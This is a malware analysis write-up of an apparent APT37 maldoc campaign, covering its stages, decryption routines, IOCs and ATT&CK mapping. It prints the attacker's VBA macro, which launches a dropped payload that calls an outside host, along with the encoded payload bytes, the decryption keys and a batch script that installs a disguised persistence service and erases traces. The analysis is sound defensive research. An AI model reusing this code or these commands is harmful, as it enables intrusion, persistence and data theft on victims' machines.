13 KiB
13 KiB
APT 37 strike again ?
Table of Contents
- Malware analysis
- Cyber kill chain
- Indicators Of Compromise (IOC)
- References MITRE ATT&CK Matrix
- Links
Malware analysis
The initial vector is an maldoc with a macro. This launches an auto-open method for decrypt the next stager, save it and execute it in push as argument the URL to contact. This saves the modification on the document for avoiding to be executing a second time by the victim.
Private Sub Document_Open()
Dim n As Long
Dim cLine As String
Dim path As String
If Image1.Width > 2 And Image1.Height > 2 Then
Image1.Width = 1
Image1.Height = 1
Image2.AutoSize = True
With ActiveDocument.Content
.Font.ColorIndex = wdBlack
End With
path = save2file()
cLine = "cmd /c cd /d %USERPROFILE% && ren up.txt up.exe && up http://mydownload-202001.c1.biz"
n = Shell(cLine, vbHide)
End If
ActiveDocument.Save
End Sub
The called method parsed the data and xor by a common value used by North Korean ATP (0XFF). This saves the result on a file on the user profile executing the payload.
Function save2file() As String
Dim nIndex As Long
Dim path As String
Dim vbuffer As String
Dim output() As String
path = Environ("USERPROFILE")
path = path & "\up.txt"
vbuffer = "B2&A5&6F&FF&FC&FF&FF&FF&FB&FF&FF&FF&00&00&FF&FF&47&FF&FF&FF&FF&FF&FF&FF&BF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF"
[...]
vbuffer = vbuffer + "88&8C&8F&8D&96&91&8B&99&BE&FF&FF&FF&A9&9A&8D&AE&8A&9A&8D&86&A9&9E&93&8A&9A&A8&FF&FF&FF&6F&FF&FF&F3&FF&FF&FF&1D&C6&27&C4&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF&FF"
output = Split(vbuffer, "&")
Open path For Binary As #1
For nIndex = LBound(output) To UBound(output)
Put #1, , CByte(("&H" & output(nIndex)) Xor &HFF)
Next nIndex
Close #1
save2file = path
End Function
The second stager executed is a PE (dll file) which is packed with UPX too. This checks the presence of the debugger and the architecture for download, the corresponding dat file.
The algorithm is a custom base64 with a key, this performs a loop which finds the corresponding reference of the index of the reference string (key). Once the done, this return a value and executed again for all the bytes of the payload are decrypted. Once this done, this writes the cab file on temp directory.
int32_t __cdecl Decrypt(int32_t arg_8h)
{
int32_t iVar1;
char cVar2;
char cVar3;
char cVar4;
char cVar5;
int32_t in_ECX;
int32_t in_EDX;
int32_t iVar6;
int32_t iVar7;
uint32_t var_14h;
int32_t var_10h;
int32_t var_ch;
int32_t var_8h;
int32_t var_4h;
iVar7 = 0;
iVar6 = 0;
do {
cVar2 = fcn.00402460("B2AwV4Ya1TqPoS-ReWsFGMCh!kmgtfJQD6iI5EUKdupv8Hbrzj7yl=LXnZcNO309x", (uint32_t)*(uint8_t *)(iVar7 + in_ECX));
cVar3 = fcn.00402460("B2AwV4Ya1TqPoS-ReWsFGMCh!kmgtfJQD6iI5EUKdupv8Hbrzj7yl=LXnZcNO309x", (uint32_t)*(uint8_t *)(iVar7 + 1 + in_ECX));
cVar4 = fcn.00402460("B2AwV4Ya1TqPoS-ReWsFGMCh!kmgtfJQD6iI5EUKdupv8Hbrzj7yl=LXnZcNO309x", (uint32_t)*(uint8_t *)(iVar7 + 2 + in_ECX));
cVar5 = fcn.00402460("B2AwV4Ya1TqPoS-ReWsFGMCh!kmgtfJQD6iI5EUKdupv8Hbrzj7yl=LXnZcNO309x", (uint32_t)*(uint8_t *)(iVar7 + 3 + in_ECX));
iVar7 = iVar7 + 4;
*(uint8_t *)(iVar6 + in_EDX) = cVar3 - 0x28U >> 4 | (cVar2 + -0x28) * '\x04';
iVar1 = iVar6 + 1;
if ((uint8_t)(cVar4 - 0x28U) != 0x40) {
*(uint8_t *)(iVar6 + 1 + in_EDX) = cVar4 - 0x28U >> 2 | (cVar3 - 0x28U) * '\x10';
iVar1 = iVar6 + 2;
}
iVar6 = iVar1;
if ((uint8_t)(cVar5 - 0x28U) != 0x40) {
*(uint8_t *)(iVar6 + in_EDX) = cVar4 << 6 | cVar5 - 0x28U;
iVar6 = iVar6 + 1;
}
} while (iVar7 < arg_8h);
return iVar6;
}
After this, the program bypass UAC is using a well-known method with access token impersonation routine in duplicates the token from one of the high integrity instances of Windows Update Standalone Installer (wusa.exe). This fileless UAC bypass is named “Cavalry” and comes from the leaks of "Vault7". This spawns a new cmd process for elevate their rights.
The elevated prompt expands the cab file and launches the bat file. This stop this own service if already installed and running on the system. Check if the files exist on the system32 folder (already copied) for copy it. Once this, create a service for the persistence and elevate again theirs rights. Finally delete the loader and the files extracted on the temp folder as anti-forensic measures.
@echo off
sc stop WPrint > nul
echo %~dp0 | findstr /i "system32" > nul
if %ERRORLEVEL% equ 0 (goto INSTALL) else (goto COPYFILE)
:COPYFILE
copy /y "%~dp0\wprint.dll" %windir%\System32 > nul
del /f /q "%~dp0\wprint.dll" > nul
copy /y "%~dp0\wprint.ini" %windir%\System32 > nul
del /f /q "%~dp0\wprint.ini" > nul
:INSTALL
sc create WPrint binpath="%windir%\system32\svchost.exe -k WPrint" DisplayName="Windows Print Service" > nul
sc description WPrint "This service opens custom printer dialog boxes and handles notifications from a remote print server or a printer." > nul
sc config WPrint type=own start=auto error=normal binpath="%windir%\system32\svchost.exe -k WPrint" > nul
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost" /v WPrint /t REG_MULTI_SZ /d "WPrint" /f > nul
reg add "HKLM\SYSTEM\CurrentControlSet\Services\WPrint\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%windir%\system32\wprint.dll" /f > nul
sc start WPrint > nul
del /f /q "%USERPROFILE%\up.exe" > nul
del /f /q "%~dpnx0" > nul
The final implant begins by getting the content of ini file for get the configuration. This is also packed with UPX.
0x10002367 push 0x208 ; 520
0x1000236c push esi
0x1000236d mov ebx, 0x10006f38 ; '8o'
0x10002372 push ebx
0x10002373 mov dword [var_4h], esi
0x10002376 call fcn.100043c0
0x1000237b add esp, 0xc
0x1000237e push 0x104 ; 260
0x10002383 push ebx
0x10002384 push dword [0x10006cd0]
0x1000238a call dword [0x10006cf8]
0x10002390 mov edi, dword [sym.imp.SHLWAPI.dll_StrRChrW] ; 0x10005044
0x10002396 push str..ini ; 0x10005060 ; u".ini"
0x1000239b push 0x2e ; '.' ; 46
0x1000239d push esi
0x1000239e push ebx
0x1000239f call edi
0x100023a1 mov esi, dword [sym.imp.KERNEL32.DLL_lstrcpyW] ; 0x10005028
0x100023a7 push eax
0x100023a8 call esi
0x100023aa push 0x208 ; 520
0x100023af push 0
0x100023b1 push 0x10007158 ; 'Xq'
0x100023b6 call fcn.100043c0
0x100023bb add esp, 0xc
0x100023be push 0x104 ; 260
0x100023c3 push 0x10007158 ; 'Xq'
0x100023c8 push dword [0x10006cd0]
0x100023ce call dword [0x10006cf8]
0x100023d4 push str..dat ; 0x1000506c ; u".dat"
0x100023d9 push 0x2e ; '.' ; 46
0x100023db push 0
0x100023dd push 0x10007158 ; 'Xq'
0x100023e2 call edi
0x100023e4 push eax
0x100023e5 call esi
0x100023e7 xor esi, esi
The content of ini file is a single string encoded with the custom key.
gmRc4b2TFu6tLPHvkdsT3Q-UIGa0IbasFdIsFdSClw7cFdR1XPDD
We can note that the same algorithm (custom base 64) for decrypt the data is used but with different parameters and key. An another detail, the function with is used for getting the first occurrence is replaced by a Native function from the Windows Shell for the same structure of the algorithm base 64.
int32_t __cdecl fcn.1000203c(int32_t arg_8h)
{
int32_t iVar1;
char cVar2;
char cVar3;
char cVar4;
char cVar5;
int32_t in_ECX;
int32_t in_EDX;
int32_t iVar6;
int32_t iVar7;
undefined4 var_14h;
int32_t var_10h;
undefined4 var_ch;
undefined4 var_8h;
int32_t var_4h;
iVar7 = 0;
iVar6 = 0;
do {
cVar2 = (*_sym.imp.SHLWAPI.dll_StrChrA) ("aMob=%PmxS5FIZNV-ROA8BQY3Lgk4XliK1wGWrdj2CpJEUyTfs0qc6uv9tzh7HneD", (uint32_t)*(uint8_t *)(iVar7 + in_ECX));
cVar3 = (*_sym.imp.SHLWAPI.dll_StrChrA) ("aMob=%PmxS5FIZNV-ROA8BQY3Lgk4XliK1wGWrdj2CpJEUyTfs0qc6uv9tzh7HneD", (uint32_t)*(uint8_t *)(iVar7 + 1 + in_ECX));
cVar4 = (*_sym.imp.SHLWAPI.dll_StrChrA) ("aMob=%PmxS5FIZNV-ROA8BQY3Lgk4XliK1wGWrdj2CpJEUyTfs0qc6uv9tzh7HneD", (uint32_t)*(uint8_t *)(iVar7 + 2 + in_ECX));
cVar5 = (*_sym.imp.SHLWAPI.dll_StrChrA) ("aMob=%PmxS5FIZNV-ROA8BQY3Lgk4XliK1wGWrdj2CpJEUyTfs0qc6uv9tzh7HneD", (uint32_t)*(uint8_t *)(iVar7 + 3 + in_ECX));
iVar7 = iVar7 + 4;
*(uint8_t *)(iVar6 + in_EDX) = cVar3 - 0x30U >> 4 | (cVar2 + -0x30) * '\x04';
iVar1 = iVar6 + 1;
if ((uint8_t)(cVar4 - 0x30U) != 0x40) {
*(uint8_t *)(iVar6 + 1 + in_EDX) = cVar4 - 0x30U >> 2 | cVar3 << 4;
iVar1 = iVar6 + 2;
}
iVar6 = iVar1;
if ((uint8_t)(cVar5 - 0x30U) != 0x40) {
*(uint8_t *)(iVar6 + in_EDX) = cVar4 << 6 | cVar5 - 0x30U;
iVar6 = iVar6 + 1;
}
} while (iVar7 < arg_8h);
return iVar6;
}
Once the strings decrypted, this adds a new reference of the codepage for the console stream (UTF8).
REG ADD HKCU\Console /v CodePage /t REG_DWORD /d 65001 /f
After sleep the process as anti-sandbox measure, this uses the URL for download the last file (4.dat) which contents, the credentials for sending to the FTP. Finally, the implant sends the system informations, list of files by FTP encoded with the custom base64 algorithm.
On the TTPs, we can note the differences compared to the TTPs observed at the end of 2019, the main differences are in bitwise operations in custom base 64 and the use of an XOR (0xFF) instead of certutil for decode the base 64 payload.In using this XOR method with this value would leave it possible that Lazarus shared one of their tools for macro editing, some parts of the code matched with parts of code used from the campagne the last year. Here, we can see TTPs from the Medium article (2019 - cf. Links):
Cyber kill chain
This process graph represent the cyber kill chain used by the attacker.
Indicators Of Compromise (IOC)
The IOC can be exported in JSON and CSV
References MITRE ATT&CK Matrix
Enterprise tactics | Technics used | Ref URL |
---|---|---|
Execution | Command-Line Interface Execution through API |
https://attack.mitre.org/techniques/T1059/ https://attack.mitre.org/techniques/T1106/ |
Persistence | Modify Existing Service New Service |
https://attack.mitre.org/techniques/T1031/ https://attack.mitre.org/techniques/T1050/ |
Privilege Escalation | New Service | https://attack.mitre.org/techniques/T1050/ |
Defense Evasion | Modify Registry Deobfuscate/Decode Files or Information |
https://attack.mitre.org/techniques/T1112/ https://attack.mitre.org/techniques/T1140/ |
Discovery | System Service Discovery Query Registry |
https://attack.mitre.org/techniques/T1007/ https://attack.mitre.org/techniques/T1012/ |
Command And Control | Custom Cryptographic Protocol | https://attack.mitre.org/techniques/T1024/ |